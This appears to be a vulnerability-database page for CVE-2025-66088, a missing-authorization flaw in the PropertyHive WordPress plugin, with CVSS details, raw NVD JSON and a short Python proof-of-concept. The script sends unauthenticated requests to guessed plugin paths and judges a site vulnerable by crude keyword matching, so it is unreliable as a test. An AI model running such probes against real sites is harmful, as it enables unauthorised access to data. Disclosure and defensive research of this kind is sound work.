Security Vulnerability Report
中文
CVE-2025-66088 CVSS 7.5 HIGH

CVE-2025-66088

Published: 2025-12-18 08:16:16
Last Modified: 2026-04-27 18:16:35

Description

Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PropertyHive WordPress Plugin <= 2.1.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66088 PoC - PropertyHive Broken Access Control # This PoC demonstrates the missing authorization vulnerability in PropertyHive plugin import requests import sys TARGET_URL = "http://target-wordpress-site.com" PLUGIN_PATH = "/wp-content/plugins/propertyhive/" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-66088 """ # Common vulnerable endpoints in PropertyHive plugin vulnerable_endpoints = [ f"{TARGET_URL}{PLUGIN_PATH}includes/ajax-handler.php", f"{TARGET_URL}{PLUGIN_PATH}includes/api/property/get-properties.php", f"{TARGET_URL}{PLUGIN_PATH}includes/api/enquiry/submit-enquiry.php" ] print(f"[*] Testing CVE-2025-66088 - PropertyHive Missing Authorization") print(f"[*] Target: {TARGET_URL}") for endpoint in vulnerable_endpoints: try: # Send unauthenticated request to check if access control is enforced response = requests.get(endpoint, timeout=10, verify=False) # Check for signs of missing authorization if response.status_code == 200: # Check if sensitive data is returned without auth if 'property' in response.text.lower() or 'address' in response.text.lower(): print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response contains sensitive data without authentication") return True elif response.status_code == 403: print(f"[-] Protected: {endpoint} - Access Denied") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability found on tested endpoints") print("[*] Manual testing may be required") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66088", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:15.670", "lastModified": "2026-04-27T18:16:34.943", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/propertyhive/vulnerability/wordpress-propertyhive-plugin-2-1-12-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}